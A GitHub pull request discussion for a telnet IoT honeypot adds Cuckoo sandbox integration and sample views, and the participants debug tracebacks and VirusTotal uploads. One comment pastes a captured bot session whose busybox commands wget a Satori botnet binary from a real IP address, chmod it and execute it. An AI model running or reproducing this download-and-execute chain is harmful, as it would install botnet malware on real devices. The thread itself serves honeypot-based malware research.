### PR TITLE
fixed/improvements

### PR DESCRIPTION
**Pull request by doomedraven**
1 - create folder automatically if not exists
2 - cuckoo integration(example linux.huntingmalware.com)
3 - debug False by default
4 - instalation documented
5 - added urls/samples tab/template

### CODE REVIEW

**Comment by Pesktador** [comment]
python backend.py
Creating/Connecting to DB
DB Setup done
Traceback (most recent call last):
  File "backend.py", line 1, in <module>
    from backend.backend import app
  File "/var/www/html/new/telnet-iot-honeypot/backend/backend.py", line 4, in <module>
    from clientcontroller import ClientController, WebController
  File "/var/www/html/new/telnet-iot-honeypot/backend/clientcontroller.py", line 13, in <module>
    from cuckoo import Cuckoo
  File "/var/www/html/new/telnet-iot-honeypot/backend/cuckoo.py", line 12, in <module>
    class Cuckoo(Object):
NameError: name 'Object' is not defined

Any idea whats wrong?

**Comment by doomedraven** [comment]
sorry my fault, fixed :)

**Comment by Pesktador** [comment]
Alright thats working now, but im still facing multiply issues.

If i open the website now the backend crashes with this output:

https://pastebin.com/Z3dtX3ZD

Also it dosent seem to put anything on virustotal? I replaced the api key in the virustotal.py and in the config.json, but nothing shows up under API submissions.

Also the honeypot itself wont save all samples, i got tons of shell files which are beeing downloaded over wget by some bots on the honeypot, but none of those files show up under samples.

**Comment by doomedraven** [comment]
the rest is not related to this PR, but it all works just fine for me and saves samples correctly

```
 # >/dev/netslink/.file && cd /dev/netslink/ && /bin/busybox rm -rf .file
 # >/var/tmp/.file && cd /var/tmp/ && /bin/busybox rm -rf .file
 # >/tmp/.file && cd /tmp/ && /bin/busybox rm -rf .file
 # >/var/.file && cd /var/ && /bin/busybox rm -rf .file
 # >/home/.file && cd /home/ && /bin/busybox rm -rf .file
 # >/var/run/.file && cd /var/run/ && /bin/busybox rm -rf .file
 # >/.file && cd / && /bin/busybox rm -rf .file
 # >./.file && cd ./ && /bin/busybox rm -rf .file
 # >/dev/.file && cd /dev/ && /bin/busybox rm -rf .file
 # >/mnt/.file && cd /mnt/ && /bin/busybox rm -rf .file
 # >/boot/.file && cd /boot/ && /bin/busybox rm -rf .file
 # >/dev/shm/.file && cd /dev/shm/ && /bin/busybox rm -rf .file
 # >/usr/.file && cd /usr/ && /bin/busybox rm -rf .file
 # /bin/busybox cp /bin/busybox gmlocerfno; >gmlocerfno; /bin/busybox chmod 777 gmlocerfno
 # /bin/busybox wget http://185.130.104.171:80/bins/satori.mpsl -O - > gmlocerfno; /bin/busybox chmod 777 gmlocerfno; ./gmlocerfno mpsl; >gmlocerfno

URLS GATHARED: ['http://185.130.104.171:80/bins/satori.mpsl']
2017-11-04 12:01:43   sampledb_client.py:41  Upload requested: http://185.130.104.171:80/bins/satori.mpsl
2017-11-04 12:01:43   sampledb_client.py:55  Downloading http://185.130.104.171:80/bins/satori.mpsl
```

**Comment by Pesktador** [comment]
I always get that broken pipe error, no idea why.

Also from where you got that sampledb_client.py output? Never saw that before.

**Comment by doomedraven** [comment]
how do you start all that?

the output is from `honeypot.py`

**Comment by Pesktador** [comment]
Found out why, it dosent even download .sh files they just show up under url and that already 20 times but not a single time it got downloaded. The website crash happens if i press F5 while im browsing it, no idea why but i can work around that..

http://i.epvpimg.com/gCPHfab.png

Do i have to place any files on a special place to get them uploaded to vt? I see on the log this:

VT https://www.virustotal.com/vtapi/v2/file/report
127.0.0.1 - - [04/Nov/2017 13:04:02] "PUT /sample/e2d9798353f7d7ee8eecc2f1d4838b86eccb5c8d4f44d33708c26e9ff3687cd9 HTTP/1.1" 200 -
127.0.0.1 - - [04/Nov/2017 13:04:02] "POST /file HTTP/1.1" 200 -
VT https://www.virustotal.com/vtapi/v2/file/report
127.0.0.1 - - [04/Nov/2017 13:04:02] "PUT /sample/967418139298887e009b9c0b0240972916a1e585fe52e2d66a22cd3a76003156 HTTP/1.1" 200 -
127.0.0.1 - - [04/Nov/2017 13:04:02] "POST /file HTTP/1.1" 200 -
VT https://www.virustotal.com/vtapi/v2/file/report
127.0.0.1 - - [04/Nov/2017 13:04:03] "PUT /sample/fb99d380b9b1d1f4b12e7f65f408cb6bf81301d786ffc3e67e3ccf7fdd0a2d78 HTTP/1.1" 200 -
127.0.0.1 - - [04/Nov/2017 13:04:03] "POST /file HTTP/1.1" 200 -

But as i said nothing is beeing submitted to vt sucesfully...

**Comment by doomedraven** [comment]
try maybe files are not available anymore, + ftp + tftp won't be downloaded by wget.
about upload to vt, idk i don't pushing samples to vt, so here you need to dig by yourself

**Comment by Pesktador** [comment]
Those files are still available, except the ftp and tftp one.

Sadly the owner of this project seems to be gone :/

**Comment by doomedraven** [comment]
feel free to use my fork, and here you have the vt upload support

**Comment by Pesktador** [comment]
Thanks man :), just saw that cukoo thingy, got any screenshot of it looks combined with this honeypot?

**Comment by doomedraven** [comment]
you are welcome, you can see it here 
https://linux.huntingmalware.com/analysis/
as in cli it only shows the id of cuckoo task

**Comment by Pesktador** [comment]
Let me guess, running cuckoo in a virtual machine will be an issue since it creates own virtual machines to gather the informations?

**Comment by doomedraven** [comment]
depends of the guest capabilities, but don't expect good perfomance in that way, if you want you can get access to that cuckoo api if you ask that in DM https://twitter.com/huntingmalware

**Comment by Phype** [comment]
Nice to see somebody using my project. To be clear, as already suggested by denniskai1234, i haven't done anything on this projects since months, basically because it is/was a hobby project to learn something (about malware/honeypots/whatever) and i don't have any use for malware samples or statistics by myself. Also, i think the approach with "emulating" the right shell behavior is maybe a bit short-sighted, because it cannot react on behavior-changes by itself.

I merged the pull request, maybe some time i will take another look on this project.

**Comment by doomedraven** [comment]
it still works just fine. Thanks for the project btw :)

**Pull request merged**
